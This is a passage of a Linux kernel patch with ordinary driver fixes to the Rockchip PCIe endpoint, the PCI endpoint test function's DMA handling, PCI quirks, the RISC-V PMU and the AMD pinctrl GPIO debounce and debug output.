+@@ -137,8 +138,9 @@ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+ 				    PCIE_CORE_CONFIG_VENDOR);
+ 	}
+ 
+-	rockchip_pcie_write(rockchip, hdr->deviceid << 16,
+-			    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) + PCI_VENDOR_ID);
++	reg = rockchip_pcie_read(rockchip, PCIE_EP_CONFIG_DID_VID);
++	reg = (reg & 0xFFFF) | (hdr->deviceid << 16);
++	rockchip_pcie_write(rockchip, reg, PCIE_EP_CONFIG_DID_VID);
+ 
+ 	rockchip_pcie_write(rockchip,
+ 			    hdr->revid |
+@@ -312,15 +314,15 @@ static int rockchip_pcie_ep_set_msi(struct pci_epc *epc, u8 fn, u8 vfn,
+ {
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u16 flags;
++	u32 flags;
+ 
+ 	flags = rockchip_pcie_read(rockchip,
+ 				   ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+ 				   ROCKCHIP_PCIE_EP_MSI_CTRL_REG);
+ 	flags &= ~ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_MASK;
+ 	flags |=
+-	   ((multi_msg_cap << 1) <<  ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET) |
+-	   PCI_MSI_FLAGS_64BIT;
++	   (multi_msg_cap << ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET) |
++	   (PCI_MSI_FLAGS_64BIT << ROCKCHIP_PCIE_EP_MSI_FLAGS_OFFSET);
+ 	flags &= ~ROCKCHIP_PCIE_EP_MSI_CTRL_MASK_MSI_CAP;
+ 	rockchip_pcie_write(rockchip, flags,
+ 			    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+@@ -332,7 +334,7 @@ static int rockchip_pcie_ep_get_msi(struct pci_epc *epc, u8 fn, u8 vfn)
+ {
+ 	struct rockchip_pcie_ep *ep = epc_get_drvdata(epc);
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u16 flags;
++	u32 flags;
+ 
+ 	flags = rockchip_pcie_read(rockchip,
+ 				   ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+@@ -345,48 +347,25 @@ static int rockchip_pcie_ep_get_msi(struct pci_epc *epc, u8 fn, u8 vfn)
+ }
+ 
+ static void rockchip_pcie_ep_assert_intx(struct rockchip_pcie_ep *ep, u8 fn,
+-					 u8 intx, bool is_asserted)
++					 u8 intx, bool do_assert)
+ {
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u32 r = ep->max_regions - 1;
+-	u32 offset;
+-	u32 status;
+-	u8 msg_code;
+-
+-	if (unlikely(ep->irq_pci_addr != ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR ||
+-		     ep->irq_pci_fn != fn)) {
+-		rockchip_pcie_prog_ep_ob_atu(rockchip, fn, r,
+-					     AXI_WRAPPER_NOR_MSG,
+-					     ep->irq_phys_addr, 0, 0);
+-		ep->irq_pci_addr = ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR;
+-		ep->irq_pci_fn = fn;
+-	}
+ 
+ 	intx &= 3;
+-	if (is_asserted) {
++
++	if (do_assert) {
+ 		ep->irq_pending |= BIT(intx);
+-		msg_code = ROCKCHIP_PCIE_MSG_CODE_ASSERT_INTA + intx;
++		rockchip_pcie_write(rockchip,
++				    PCIE_CLIENT_INT_IN_ASSERT |
++				    PCIE_CLIENT_INT_PEND_ST_PEND,
++				    PCIE_CLIENT_LEGACY_INT_CTRL);
+ 	} else {
+ 		ep->irq_pending &= ~BIT(intx);
+-		msg_code = ROCKCHIP_PCIE_MSG_CODE_DEASSERT_INTA + intx;
++		rockchip_pcie_write(rockchip,
++				    PCIE_CLIENT_INT_IN_DEASSERT |
++				    PCIE_CLIENT_INT_PEND_ST_NORMAL,
++				    PCIE_CLIENT_LEGACY_INT_CTRL);
+ 	}
+-
+-	status = rockchip_pcie_read(rockchip,
+-				    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+-				    ROCKCHIP_PCIE_EP_CMD_STATUS);
+-	status &= ROCKCHIP_PCIE_EP_CMD_STATUS_IS;
+-
+-	if ((status != 0) ^ (ep->irq_pending != 0)) {
+-		status ^= ROCKCHIP_PCIE_EP_CMD_STATUS_IS;
+-		rockchip_pcie_write(rockchip, status,
+-				    ROCKCHIP_PCIE_EP_FUNC_BASE(fn) +
+-				    ROCKCHIP_PCIE_EP_CMD_STATUS);
+-	}
+-
+-	offset =
+-	   ROCKCHIP_PCIE_MSG_ROUTING(ROCKCHIP_PCIE_MSG_ROUTING_LOCAL_INTX) |
+-	   ROCKCHIP_PCIE_MSG_CODE(msg_code) | ROCKCHIP_PCIE_MSG_NO_DATA;
+-	writel(0, ep->irq_cpu_addr + offset);
+ }
+ 
+ static int rockchip_pcie_ep_send_legacy_irq(struct rockchip_pcie_ep *ep, u8 fn,
+@@ -416,7 +395,7 @@ static int rockchip_pcie_ep_send_msi_irq(struct rockchip_pcie_ep *ep, u8 fn,
+ 					 u8 interrupt_num)
+ {
+ 	struct rockchip_pcie *rockchip = &ep->rockchip;
+-	u16 flags, mme, data, data_mask;
++	u32 flags, mme, data, data_mask;
+ 	u8 msi_count;
+ 	u64 pci_addr, pci_addr_mask = 0xff;
+ 
+@@ -506,6 +485,7 @@ static const struct pci_epc_features rockchip_pcie_epc_features = {
+ 	.linkup_notifier = false,
+ 	.msi_capable = true,
+ 	.msix_capable = false,
++	.align = 256,
+ };
+ 
+ static const struct pci_epc_features*
+@@ -631,6 +611,9 @@ static int rockchip_pcie_ep_probe(struct platform_device *pdev)
+ 
+ 	ep->irq_pci_addr = ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR;
+ 
++	rockchip_pcie_write(rockchip, PCIE_CLIENT_CONF_ENABLE,
++			    PCIE_CLIENT_CONFIG);
++
+ 	return 0;
+ err_epc_mem_exit:
+ 	pci_epc_mem_exit(epc);
+diff --git a/drivers/pci/controller/pcie-rockchip.c b/drivers/pci/controller/pcie-rockchip.c
+index 990a00e08bc5b..1aa84035a8bc7 100644
+--- a/drivers/pci/controller/pcie-rockchip.c
++++ b/drivers/pci/controller/pcie-rockchip.c
+@@ -14,6 +14,7 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/gpio/consumer.h>
++#include <linux/iopoll.h>
+ #include <linux/of_pci.h>
+ #include <linux/phy/phy.h>
+ #include <linux/platform_device.h>
+@@ -153,6 +154,12 @@ int rockchip_pcie_parse_dt(struct rockchip_pcie *rockchip)
+ }
+ EXPORT_SYMBOL_GPL(rockchip_pcie_parse_dt);
+ 
++#define rockchip_pcie_read_addr(addr) rockchip_pcie_read(rockchip, addr)
++/* 100 ms max wait time for PHY PLLs to lock */
++#define RK_PHY_PLL_LOCK_TIMEOUT_US 100000
++/* Sleep should be less than 20ms */
++#define RK_PHY_PLL_LOCK_SLEEP_US 1000
++
+ int rockchip_pcie_init_port(struct rockchip_pcie *rockchip)
+ {
+ 	struct device *dev = rockchip->dev;
+@@ -254,6 +261,16 @@ int rockchip_pcie_init_port(struct rockchip_pcie *rockchip)
+ 		}
+ 	}
+ 
++	err = readx_poll_timeout(rockchip_pcie_read_addr,
++				 PCIE_CLIENT_SIDE_BAND_STATUS,
++				 regs, !(regs & PCIE_CLIENT_PHY_ST),
++				 RK_PHY_PLL_LOCK_SLEEP_US,
++				 RK_PHY_PLL_LOCK_TIMEOUT_US);
++	if (err) {
++		dev_err(dev, "PHY PLLs could not lock, %d\n", err);
++		goto err_power_off_phy;
++	}
++
+ 	/*
+ 	 * Please don't reorder the deassert sequence of the following
+ 	 * four reset pins.
+diff --git a/drivers/pci/controller/pcie-rockchip.h b/drivers/pci/controller/pcie-rockchip.h
+index 32c3a859c26b2..8e92dc3339ecc 100644
+--- a/drivers/pci/controller/pcie-rockchip.h
++++ b/drivers/pci/controller/pcie-rockchip.h
+@@ -38,6 +38,13 @@
+ #define   PCIE_CLIENT_MODE_EP            HIWORD_UPDATE(0x0040, 0)
+ #define   PCIE_CLIENT_GEN_SEL_1		  HIWORD_UPDATE(0x0080, 0)
+ #define   PCIE_CLIENT_GEN_SEL_2		  HIWORD_UPDATE_BIT(0x0080)
++#define PCIE_CLIENT_LEGACY_INT_CTRL	(PCIE_CLIENT_BASE + 0x0c)
++#define   PCIE_CLIENT_INT_IN_ASSERT		HIWORD_UPDATE_BIT(0x0002)
++#define   PCIE_CLIENT_INT_IN_DEASSERT		HIWORD_UPDATE(0x0002, 0)
++#define   PCIE_CLIENT_INT_PEND_ST_PEND		HIWORD_UPDATE_BIT(0x0001)
++#define   PCIE_CLIENT_INT_PEND_ST_NORMAL	HIWORD_UPDATE(0x0001, 0)
++#define PCIE_CLIENT_SIDE_BAND_STATUS	(PCIE_CLIENT_BASE + 0x20)
++#define   PCIE_CLIENT_PHY_ST			BIT(12)
+ #define PCIE_CLIENT_DEBUG_OUT_0		(PCIE_CLIENT_BASE + 0x3c)
+ #define   PCIE_CLIENT_DEBUG_LTSSM_MASK		GENMASK(5, 0)
+ #define   PCIE_CLIENT_DEBUG_LTSSM_L1		0x18
+@@ -133,6 +140,8 @@
+ #define PCIE_RC_RP_ATS_BASE		0x400000
+ #define PCIE_RC_CONFIG_NORMAL_BASE	0x800000
+ #define PCIE_RC_CONFIG_BASE		0xa00000
++#define PCIE_EP_CONFIG_BASE		0xa00000
++#define PCIE_EP_CONFIG_DID_VID		(PCIE_EP_CONFIG_BASE + 0x00)
+ #define PCIE_RC_CONFIG_RID_CCR		(PCIE_RC_CONFIG_BASE + 0x08)
+ #define PCIE_RC_CONFIG_DCR		(PCIE_RC_CONFIG_BASE + 0xc4)
+ #define   PCIE_RC_CONFIG_DCR_CSPL_SHIFT		18
+@@ -216,6 +225,7 @@
+ #define ROCKCHIP_PCIE_EP_CMD_STATUS			0x4
+ #define   ROCKCHIP_PCIE_EP_CMD_STATUS_IS		BIT(19)
+ #define ROCKCHIP_PCIE_EP_MSI_CTRL_REG			0x90
++#define   ROCKCHIP_PCIE_EP_MSI_FLAGS_OFFSET		16
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_OFFSET		17
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MMC_MASK		GENMASK(19, 17)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MME_OFFSET		20
+@@ -223,7 +233,6 @@
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_ME				BIT(16)
+ #define   ROCKCHIP_PCIE_EP_MSI_CTRL_MASK_MSI_CAP	BIT(24)
+ #define ROCKCHIP_PCIE_EP_DUMMY_IRQ_ADDR				0x1
+-#define ROCKCHIP_PCIE_EP_PCI_LEGACY_IRQ_ADDR		0x3
+ #define ROCKCHIP_PCIE_EP_FUNC_BASE(fn)	(((fn) << 12) & GENMASK(19, 12))
+ #define ROCKCHIP_PCIE_AT_IB_EP_FUNC_BAR_ADDR0(fn, bar) \
+ 	(PCIE_RC_RP_ATS_BASE + 0x0840 + (fn) * 0x0040 + (bar) * 0x0008)
+diff --git a/drivers/pci/endpoint/functions/pci-epf-test.c b/drivers/pci/endpoint/functions/pci-epf-test.c
+index f0c4d0f77453a..2e8a4de2ababd 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-test.c
++++ b/drivers/pci/endpoint/functions/pci-epf-test.c
+@@ -54,6 +54,9 @@ struct pci_epf_test {
+ 	struct delayed_work	cmd_handler;
+ 	struct dma_chan		*dma_chan_tx;
+ 	struct dma_chan		*dma_chan_rx;
++	struct dma_chan		*transfer_chan;
++	dma_cookie_t		transfer_cookie;
++	enum dma_status		transfer_status;
+ 	struct completion	transfer_complete;
+ 	bool			dma_supported;
+ 	bool			dma_private;
+@@ -85,8 +88,14 @@ static size_t bar_size[] = { 512, 512, 1024, 16384, 131072, 1048576 };
+ static void pci_epf_test_dma_callback(void *param)
+ {
+ 	struct pci_epf_test *epf_test = param;
+-
+-	complete(&epf_test->transfer_complete);
++	struct dma_tx_state state;
++
++	epf_test->transfer_status =
++		dmaengine_tx_status(epf_test->transfer_chan,
++				    epf_test->transfer_cookie, &state);
++	if (epf_test->transfer_status == DMA_COMPLETE ||
++	    epf_test->transfer_status == DMA_ERROR)
++		complete(&epf_test->transfer_complete);
+ }
+ 
+ /**
+@@ -120,7 +129,6 @@ static int pci_epf_test_data_transfer(struct pci_epf_test *epf_test,
+ 	struct dma_async_tx_descriptor *tx;
+ 	struct dma_slave_config sconf = {};
+ 	struct device *dev = &epf->dev;
+-	dma_cookie_t cookie;
+ 	int ret;
+ 
+ 	if (IS_ERR_OR_NULL(chan)) {
+@@ -151,26 +159,34 @@ static int pci_epf_test_data_transfer(struct pci_epf_test *epf_test,
+ 		return -EIO;
+ 	}
+ 
++	reinit_completion(&epf_test->transfer_complete);
++	epf_test->transfer_chan = chan;
+ 	tx->callback = pci_epf_test_dma_callback;
+ 	tx->callback_param = epf_test;
+-	cookie = tx->tx_submit(tx);
+-	reinit_completion(&epf_test->transfer_complete);
++	epf_test->transfer_cookie = tx->tx_submit(tx);
+ 
+-	ret = dma_submit_error(cookie);
++	ret = dma_submit_error(epf_test->transfer_cookie);
+ 	if (ret) {
+-		dev_err(dev, "Failed to do DMA tx_submit %d\n", cookie);
+-		return -EIO;
++		dev_err(dev, "Failed to do DMA tx_submit %d\n", ret);
++		goto terminate;
+ 	}
+ 
+ 	dma_async_issue_pending(chan);
+ 	ret = wait_for_completion_interruptible(&epf_test->transfer_complete);
+ 	if (ret < 0) {
+-		dmaengine_terminate_sync(chan);
+-		dev_err(dev, "DMA wait_for_completion_timeout\n");
+-		return -ETIMEDOUT;
++		dev_err(dev, "DMA wait_for_completion interrupted\n");
++		goto terminate;
+ 	}
+ 
+-	return 0;
++	if (epf_test->transfer_status == DMA_ERROR) {
++		dev_err(dev, "DMA transfer failed\n");
++		ret = -EIO;
++	}
++
++terminate:
++	dmaengine_terminate_sync(chan);
++
++	return ret;
+ }
+ 
+ struct epf_dma_filter {
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 98d841a7b45bb..88c4372499825 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -2942,13 +2942,13 @@ static const struct dmi_system_id bridge_d3_blacklist[] = {
+ 	{
+ 		/*
+ 		 * Downstream device is not accessible after putting a root port
+-		 * into D3cold and back into D0 on Elo i2.
++		 * into D3cold and back into D0 on Elo Continental Z2 board
+ 		 */
+-		.ident = "Elo i2",
++		.ident = "Elo Continental Z2",
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Elo Touch Solutions"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Elo i2"),
+-			DMI_MATCH(DMI_PRODUCT_VERSION, "RevB"),
++			DMI_MATCH(DMI_BOARD_VENDOR, "Elo Touch Solutions"),
++			DMI_MATCH(DMI_BOARD_NAME, "Geminilake"),
++			DMI_MATCH(DMI_BOARD_VERSION, "Continental Z2"),
+ 		},
+ 	},
+ #endif
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 90e676439170b..7170516298b0b 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -994,8 +994,10 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 	resource_list_for_each_entry_safe(window, n, &resources) {
+ 		offset = window->offset;
+ 		res = window->res;
+-		if (!res->flags && !res->start && !res->end)
++		if (!res->flags && !res->start && !res->end) {
++			release_resource(res);
+ 			continue;
++		}
+ 
+ 		list_move_tail(&window->node, &bridge->windows);
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index ccc90656130a0..472fa2c8ebcec 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4174,6 +4174,8 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MARVELL_EXT, 0x9220,
+ /* https://bugzilla.kernel.org/show_bug.cgi?id=42679#c49 */
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MARVELL_EXT, 0x9230,
+ 			 quirk_dma_func1_alias);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MARVELL_EXT, 0x9235,
++			 quirk_dma_func1_alias);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_TTI, 0x0642,
+ 			 quirk_dma_func1_alias);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_TTI, 0x0645,
+diff --git a/drivers/perf/riscv_pmu.c b/drivers/perf/riscv_pmu.c
+index ebca5eab9c9be..56897d4d4fd3e 100644
+--- a/drivers/perf/riscv_pmu.c
++++ b/drivers/perf/riscv_pmu.c
+@@ -181,9 +181,6 @@ void riscv_pmu_start(struct perf_event *event, int flags)
+ 	uint64_t max_period = riscv_pmu_ctr_get_width_mask(event);
+ 	u64 init_val;
+ 
+-	if (WARN_ON_ONCE(!(event->hw.state & PERF_HES_STOPPED)))
+-		return;
+-
+ 	if (flags & PERF_EF_RELOAD)
+ 		WARN_ON_ONCE(!(event->hw.state & PERF_HES_UPTODATE));
+ 
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 32c3edaf90385..a8df77e80549c 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -115,16 +115,20 @@ static void amd_gpio_set_value(struct gpio_chip *gc, unsigned offset, int value)
+ 	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+ }
+ 
+-static int amd_gpio_set_debounce(struct gpio_chip *gc, unsigned offset,
+-		unsigned debounce)
++static int amd_gpio_set_debounce(struct amd_gpio *gpio_dev, unsigned int offset,
++				 unsigned int debounce)
+ {
+ 	u32 time;
+ 	u32 pin_reg;
+ 	int ret = 0;
+-	unsigned long flags;
+-	struct amd_gpio *gpio_dev = gpiochip_get_data(gc);
+ 
+-	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++	/* Use special handling for Pin0 debounce */
++	if (offset == 0) {
++		pin_reg = readl(gpio_dev->base + WAKE_INT_MASTER_REG);
++		if (pin_reg & INTERNAL_GPIO0_DEBOUNCE)
++			debounce = 0;
++	}
++
+ 	pin_reg = readl(gpio_dev->base + offset * 4);
+ 
+ 	if (debounce) {
+@@ -175,23 +179,10 @@ static int amd_gpio_set_debounce(struct gpio_chip *gc, unsigned offset,
+ 		pin_reg &= ~(DB_CNTRl_MASK << DB_CNTRL_OFF);
+ 	}
+ 	writel(pin_reg, gpio_dev->base + offset * 4);
+-	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+ 
+ 	return ret;
+ }
+ 
+-static int amd_gpio_set_config(struct gpio_chip *gc, unsigned offset,
+-			       unsigned long config)
+-{
+-	u32 debounce;
+-
+-	if (pinconf_to_config_param(config) != PIN_CONFIG_INPUT_DEBOUNCE)
+-		return -ENOTSUPP;
+-
+-	debounce = pinconf_to_config_argument(config);
+-	return amd_gpio_set_debounce(gc, offset, debounce);
+-}
+-
+ #ifdef CONFIG_DEBUG_FS
+ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ {
+@@ -206,19 +197,19 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 
+ 	char *level_trig;
+ 	char *active_level;
+-	char *interrupt_enable;
+ 	char *interrupt_mask;
+ 	char *wake_cntrl0;
+ 	char *wake_cntrl1;
+ 	char *wake_cntrl2;
+ 	char *pin_sts;
+-	char *pull_up_sel;
+-	char *pull_up_enable;
+-	char *pull_down_enable;
++	char *interrupt_sts;
++	char *wake_sts;
+ 	char *orientation;
+ 	char debounce_value[40];
+ 	char *debounce_enable;
++	char *wake_cntrlz;
+ 
++	seq_printf(s, "WAKE_INT_MASTER_REG: 0x%08x\n", readl(gpio_dev->base + WAKE_INT_MASTER_REG));
+ 	for (bank = 0; bank < gpio_dev->hwbank_num; bank++) {
+ 		unsigned int time = 0;
+ 		unsigned int unit = 0;
+@@ -245,6 +236,7 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 			continue;
+ 		}
+ 		seq_printf(s, "GPIO bank%d\n", bank);
++		seq_puts(s, "gpio\t  int|active|trigger|S0i3| S3|S4/S5| Z|wake|pull|  orient|       debounce|reg\n");
+ 		for (; i < pin_num; i++) {
+ 			seq_printf(s, "#%d\t", i);
+ 			raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+@@ -254,7 +246,6 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 			if (pin_reg & BIT(INTERRUPT_ENABLE_OFF)) {
+ 				u8 level = (pin_reg >> ACTIVE_LEVEL_OFF) &
+ 						ACTIVE_LEVEL_MASK;
+-				interrupt_enable = "+";
+ 
+ 				if (level == ACTIVE_LEVEL_HIGH)
+ 					active_level = "↑";
+@@ -271,59 +262,61 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 				else
+ 					level_trig = " edge";
+ 
+-			} else {
+-				interrupt_enable = "∅";
+-				active_level = "∅";
+-				level_trig = "    ∅";
+-			}
++				if (pin_reg & BIT(INTERRUPT_MASK_OFF))
++					interrupt_mask = "😛";
++				else
++					interrupt_mask = "😷";
+ 
+-			if (pin_reg & BIT(INTERRUPT_MASK_OFF))
+-				interrupt_mask = "😛";
+-			else
+-				interrupt_mask = "😷";
+-			seq_printf(s, "int %s (%s)| active-%s| %s-⚡| ",
+-				   interrupt_enable,
++				if (pin_reg & BIT(INTERRUPT_STS_OFF))
++					interrupt_sts = "🔥";
++				else
++					interrupt_sts = "  ";
++
++				seq_printf(s, "%s %s|     %s|  %s|",
++				   interrupt_sts,
+ 				   interrupt_mask,
+ 				   active_level,
+ 				   level_trig);
++			} else
++				seq_puts(s, "    ∅|      |       |");
+ 
+ 			if (pin_reg & BIT(WAKE_CNTRL_OFF_S0I3))
+ 				wake_cntrl0 = "⏰";
+ 			else
+-				wake_cntrl0 = " ∅";
+-			seq_printf(s, "S0i3 %s| ", wake_cntrl0);
++				wake_cntrl0 = "  ";
++			seq_printf(s, "  %s| ", wake_cntrl0);
+ 
+ 			if (pin_reg & BIT(WAKE_CNTRL_OFF_S3))
+ 				wake_cntrl1 = "⏰";
+ 			else
+-				wake_cntrl1 = " ∅";
+-			seq_printf(s, "S3 %s| ", wake_cntrl1);
++				wake_cntrl1 = "  ";
++			seq_printf(s, "%s|", wake_cntrl1);
+ 
+ 			if (pin_reg & BIT(WAKE_CNTRL_OFF_S4))
+ 				wake_cntrl2 = "⏰";
+ 			else
+-				wake_cntrl2 = " ∅";
+-			seq_printf(s, "S4/S5 %s| ", wake_cntrl2);
++				wake_cntrl2 = "  ";
++			seq_printf(s, "   %s|", wake_cntrl2);
+ 
+-			if (pin_reg & BIT(PULL_UP_ENABLE_OFF)) {
+-				pull_up_enable = "+";
+-				if (pin_reg & BIT(PULL_UP_SEL_OFF))
+-					pull_up_sel = "8k";
+-				else
+-					pull_up_sel = "4k";
+-			} else {
+-				pull_up_enable = "∅";
+-				pull_up_sel = "  ";
+-			}
+-			seq_printf(s, "pull-↑ %s (%s)| ",
+-				   pull_up_enable,
+-				   pull_up_sel);
++			if (pin_reg & BIT(WAKECNTRL_Z_OFF))
++				wake_cntrlz = "⏰";
++			else
++				wake_cntrlz = "  ";
++			seq_printf(s, "%s|", wake_cntrlz);
+ 
+-			if (pin_reg & BIT(PULL_DOWN_ENABLE_OFF))
+-				pull_down_enable = "+";
++			if (pin_reg & BIT(WAKE_STS_OFF))
++				wake_sts = "🔥";
+ 			else
+-				pull_down_enable = "∅";
+-			seq_printf(s, "pull-↓ %s| ", pull_down_enable);
++				wake_sts = " ";
++			seq_printf(s, "   %s|", wake_sts);
++
++			if (pin_reg & BIT(PULL_UP_ENABLE_OFF)) {
++				seq_puts(s, "  ↑ |");
++			} else if (pin_reg & BIT(PULL_DOWN_ENABLE_OFF)) {
++				seq_puts(s, "  ↓ |");
++			} else  {
++				seq_puts(s, "    |");
++			}
+ 
+ 			if (pin_reg & BIT(OUTPUT_ENABLE_OFF)) {
+ 				pin_sts = "output";
+@@ -338,7 +331,7 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 				else
+ 					orientation = "↓";
+ 			}
+-			seq_printf(s, "%s %s| ", pin_sts, orientation);
++			seq_printf(s, "%s %s|", pin_sts, orientation);
+ 
+ 			db_cntrl = (DB_CNTRl_MASK << DB_CNTRL_OFF) & pin_reg;
+ 			if (db_cntrl) {
+@@ -357,19 +350,17 @@ static void amd_gpio_dbg_show(struct seq_file *s, struct gpio_chip *gc)
+ 						unit = 61;
+ 				}
+ 				if ((DB_TYPE_REMOVE_GLITCH << DB_CNTRL_OFF) == db_cntrl)
+-					debounce_enable = "b +";
++					debounce_enable = "b";
+ 				else if ((DB_TYPE_PRESERVE_LOW_GLITCH << DB_CNTRL_OFF) == db_cntrl)
+-					debounce_enable = "↓ +";
++					debounce_enable = "↓";
+ 				else
+-					debounce_enable = "↑ +";
+-
++					debounce_enable = "↑";
++				snprintf(debounce_value, sizeof(debounce_value), "%06u", time * unit);
++				seq_printf(s, "%s (🕑 %sus)|", debounce_enable, debounce_value);
+ 			} else {
+-				debounce_enable = "  ∅";
+-				time = 0;
++				seq_puts(s, "               |");
+ 			}
+-			snprintf(debounce_value, sizeof(debounce_value), "%u", time * unit);
+-			seq_printf(s, "debounce %s (🕑 %sus)| ", debounce_enable, debounce_value);
+-			seq_printf(s, " 0x%x\n", pin_reg);
++			seq_printf(s, "0x%x\n", pin_reg);
+ 		}
+ 	}
+ }
+@@ -648,21 +639,21 @@ static bool do_amd_gpio_irq_handler(int irq, void *dev_id)
+ 			 * We must read the pin register again, in case the
+ 			 * value was changed while executing
+ 			 * generic_handle_domain_irq() above.
+-			 * If we didn't find a mapping for the interrupt,
+-			 * disable it in order to avoid a system hang caused
+-			 * by an interrupt storm.
++			 * If the line is not an irq, disable it in order to
++			 * avoid a system hang caused by an interrupt storm.
+ 			 */
+ 			raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 			regval = readl(regs + i);
+-			if (irq == 0) {
+-				regval &= ~BIT(INTERRUPT_ENABLE_OFF);
++			if (!gpiochip_line_is_irq(gc, irqnr + i)) {
++				regval &= ~BIT(INTERRUPT_MASK_OFF);
+ 				dev_dbg(&gpio_dev->pdev->dev,
+ 					"Disabling spurious GPIO IRQ %d\n",
+ 					irqnr + i);
++			} else {
++				ret = true;
+ 			}
+ 			writel(regval, regs + i);
+ 			raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-			ret = true;
+ 		}
+ 	}
+ 	/* did not cause wake on resume context for shared IRQ */
+@@ -749,7 +740,7 @@ static int amd_pinconf_get(struct pinctrl_dev *pctldev,
+ 		break;
+ 
+ 	case PIN_CONFIG_BIAS_PULL_UP:
+-		arg = (pin_reg >> PULL_UP_SEL_OFF) & (BIT(0) | BIT(1));
++		arg = (pin_reg >> PULL_UP_ENABLE_OFF) & BIT(0);
+ 		break;
+ 
+ 	case PIN_CONFIG_DRIVE_STRENGTH:
+@@ -768,7 +759,7 @@ static int amd_pinconf_get(struct pinctrl_dev *pctldev,
+ }
+ 
+ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+-				unsigned long *configs, unsigned num_configs)
++			   unsigned long *configs, unsigned int num_configs)
+ {
+ 	int i;
+ 	u32 arg;
+@@ -786,9 +777,8 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 
+ 		switch (param) {
+ 		case PIN_CONFIG_INPUT_DEBOUNCE:
+-			pin_reg &= ~DB_TMR_OUT_MASK;
+-			pin_reg |= arg & DB_TMR_OUT_MASK;
+-			break;
++			ret = amd_gpio_set_debounce(gpio_dev, pin, arg);
++			goto out_unlock;
+ 
+ 		case PIN_CONFIG_BIAS_PULL_DOWN:
+ 			pin_reg &= ~BIT(PULL_DOWN_ENABLE_OFF);
+@@ -796,10 +786,8 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 			break;
+ 
+ 		case PIN_CONFIG_BIAS_PULL_UP:
+-			pin_reg &= ~BIT(PULL_UP_SEL_OFF);
+-			pin_reg |= (arg & BIT(0)) << PULL_UP_SEL_OFF;
+ 			pin_reg &= ~BIT(PULL_UP_ENABLE_OFF);
+-			pin_reg |= ((arg>>1) & BIT(0)) << PULL_UP_ENABLE_OFF;
++			pin_reg |= (arg & BIT(0)) << PULL_UP_ENABLE_OFF;
+ 			break;
+ 
+ 		case PIN_CONFIG_DRIVE_STRENGTH:
+@@ -817,6 +805,7 @@ static int amd_pinconf_set(struct pinctrl_dev *pctldev, unsigned int pin,
+ 
+ 		writel(pin_reg, gpio_dev->base + pin*4);
+ 	}
++out_unlock:
+ 	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+ 
+ 	return ret;
+@@ -858,6 +847,14 @@ static int amd_pinconf_group_set(struct pinctrl_dev *pctldev,
+ 	return 0;
+ }
+ 
++static int amd_gpio_set_config(struct gpio_chip *gc, unsigned int pin,
++			       unsigned long config)
++{
++	struct amd_gpio *gpio_dev = gpiochip_get_data(gc);
++
++	return amd_pinconf_set(gpio_dev->pctrl, pin, &config, 1);
++}
++
+ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_get		= amd_pinconf_get,
+ 	.pin_config_set		= amd_pinconf_set,
+@@ -865,34 +862,6 @@ static const struct pinconf_ops amd_pinconf_ops = {
